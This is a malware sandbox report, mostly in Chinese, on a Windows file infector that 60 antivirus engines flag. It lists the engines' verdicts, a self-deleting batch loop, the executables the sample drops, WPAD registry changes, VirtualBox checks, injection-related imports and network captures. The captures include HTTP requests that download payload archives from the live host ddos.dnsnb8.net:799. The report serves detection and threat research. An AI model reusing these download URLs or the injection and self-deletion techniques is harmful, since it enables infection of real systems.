6.0
高危
60 个模型检测该样本为恶意!
重新分析
更多

44115eaa38b20fb9b419ec838e077ccb9a6acc1f35475f263a022b43cbfc3457

a958931367991102ede9523698e28116.exe

分析耗时

75s

最近分析

文件大小

42.5KB
静态报毒 动态报毒 100% A + W32 A0PT9+JOAJW AI SCORE=74 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR GENASA HIGH CONFIDENCE JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER RAMNIT ROUE SCORE SMALL STATIC AI UNSAFE VJADTRE WALI WAPOMI 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Virus:Win32/Nimnul.f7bf5fec 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Tencent Virus.Win32.Loader.aab 20201211 1.0.0.1
Kingsoft 20201211 2017.9.26.565
McAfee W32/Kudj 20201211 6.0.6.653
静态指标
Command line console output was observed (50 out of 382 个事件)
Time & API Arguments Status Return Repeated
1619827314.617999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.632999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827314.679999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.836999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827314.851999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827314.867999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.882999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827314.882999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.882999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827314.898999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827314.898999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.898999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827314.914999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.929999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827314.945999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827314.961999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827314.992999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.992999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827314.992999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.023999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827315.054999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827315.070999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.070999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827315.086999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.086999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827315.086999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827315.148999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.148999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827315.148999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.226999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827315.242999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827315.257999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.257999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827315.273999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.273999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827315.273999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827315.304999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.304999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827315.304999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.336999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827315.336999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827315.367999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.367999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827315.382999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.382999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827315.382999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section %L\x08m\xa3u\xda
行为判定
动态指标
Creates executable files on the filesystem (24 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34b359ef.bat
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\qeOcSM.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\09552358.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\71B65E8E.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\100B2D25.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\465C695C.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\16EE2AAC.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\47544E73.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\789A5C15.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\28071AC5.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\636E227E.exe
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34b359ef.bat
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\qeOcSM.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619826900.398103
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34b359ef.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\34b359ef.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619826880.554103
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 6.934625482785179 section {'size_of_data': '0x00004200', 'virtual_address': '0x0004c000', 'entropy': 6.934625482785179, 'name': '%L\\x08m\\xa3u\\xda', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
entropy 0.39759036144578314 description Overall entropy of this PE file is high
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619826883.148103
RegSetValueExA
key_handle: 0x00000404
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000404
value: 0¤°>ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000404
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619826883.148103
RegSetValueExW
key_handle: 0x00000404
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000410
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000410
value: 0¤°>ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000410
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619826883.179103
RegSetValueExW
key_handle: 0x000003e8
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x000003c8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x000003c8
value: ðû.?ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x000003c8
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619826883.961103
RegSetValueExW
key_handle: 0x000003c8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x0000040c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x0000040c
value: ðû.?ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x0000040c
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 个事件)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Application.Agent.GKV
FireEye Generic.mg.a958931367991102
Cylance Unsafe
VIPRE Virus.Win32.Small.acea (v)
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.f7bf5fec
K7GW Virus ( 0040f7441 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Application.Agent.GKV
Baidu Win32.Virus.Otwycal.d
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Downloader-64720
Kaspersky Virus.Win32.Nimnul.f
BitDefender Application.Agent.GKV
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Tencent Virus.Win32.Loader.aab
Ad-Aware Application.Agent.GKV
TACHYON Virus/W32.Ramnit.C
Sophos ML/PE-A + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
Zillya Virus.Nimnul.Win32.5
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Kudj.ph
Emsisoft Application.Agent.GKV (B)
Ikarus Trojan-Downloader.Win32.Small
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03202201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
Cynet Malicious (score: 100)
AhnLab-V3 Win32/VJadtre.Gen
Acronis suspicious
McAfee W32/Kudj
MAX malware (ai score=74)
VBA32 Virus.Nimnul.19209
Zoner Virus.Win32.23755
ESET-NOD32 Win32/Wapomi.BA
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2017-04-06 06:17:44

Imports

Library ADVAPI32.dll:
0x449220 OpenProcessToken
Library KERNEL32.dll:
0x449228 CloseHandle
0x44922c CreateFileW
0x449230 CreateRemoteThread
0x44923c DuplicateHandle
0x449248 GetCommandLineW
0x44924c GetCurrentProcess
0x449250 GetCurrentProcessId
0x449254 GetCurrentThreadId
0x449258 GetExitCodeThread
0x44925c GetFullPathNameW
0x449260 GetLastError
0x449264 GetLongPathNameW
0x449268 GetModuleHandleA
0x44926c GetModuleHandleW
0x449270 GetProcAddress
0x449274 GetStartupInfoA
0x449278 GetSystemInfo
0x449280 GetTickCount
0x44928c LoadLibraryA
0x449290 MoveFileW
0x449294 OpenProcess
0x449298 OpenThread
0x44929c Process32FirstW
0x4492a0 Process32NextW
0x4492a8 QueueUserAPC
0x4492ac ReadProcessMemory
0x4492b0 ResumeThread
0x4492b8 Sleep
0x4492bc TerminateProcess
0x4492c0 TlsGetValue
0x4492c8 VirtualAllocEx
0x4492cc VirtualFreeEx
0x4492d0 VirtualProtect
0x4492d4 VirtualQuery
0x4492d8 VirtualQueryEx
0x4492dc WaitForSingleObject
0x4492e0 WriteFile
0x4492e4 WriteProcessMemory
0x4492e8 lstrlenW
Library msvcrt.dll:
0x4492f0 __dllonexit
0x4492f4 __getmainargs
0x4492f8 __initenv
0x4492fc __lconv_init
0x449300 __set_app_type
0x449304 __setusermatherr
0x449308 _acmdln
0x44930c _amsg_exit
0x449310 _cexit
0x449314 _errno
0x449318 _fmode
0x44931c _initterm
0x449320 _iob
0x449324 _lock
0x449328 _onexit
0x44932c calloc
0x449330 exit
0x449334 fprintf
0x449338 free
0x44933c fwrite
0x449340 iswctype
0x449344 malloc
0x449348 memcpy
0x44934c memset
0x449350 printf
0x449354 signal
0x449358 strlen
0x44935c strncmp
0x449360 _unlock
0x449364 _wgetenv
0x449368 abort
0x44936c vfprintf
0x449370 wcscmp
0x449374 wcscpy
0x449378 wcstol
0x44937c _vsnprintf
0x449380 _wcsicmp
Library SHELL32.dll:
0x449388 CommandLineToArgvW
Library SHLWAPI.dll:
0x449390 PathFileExistsW
Library USER32.dll:
0x449398 MessageBoxA
0x44939c wsprintfW

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49177 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49178 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49186 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49187 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49190 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar 
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k3.rar 
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k2.rar 
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k5.rar 
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k4.rar 
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.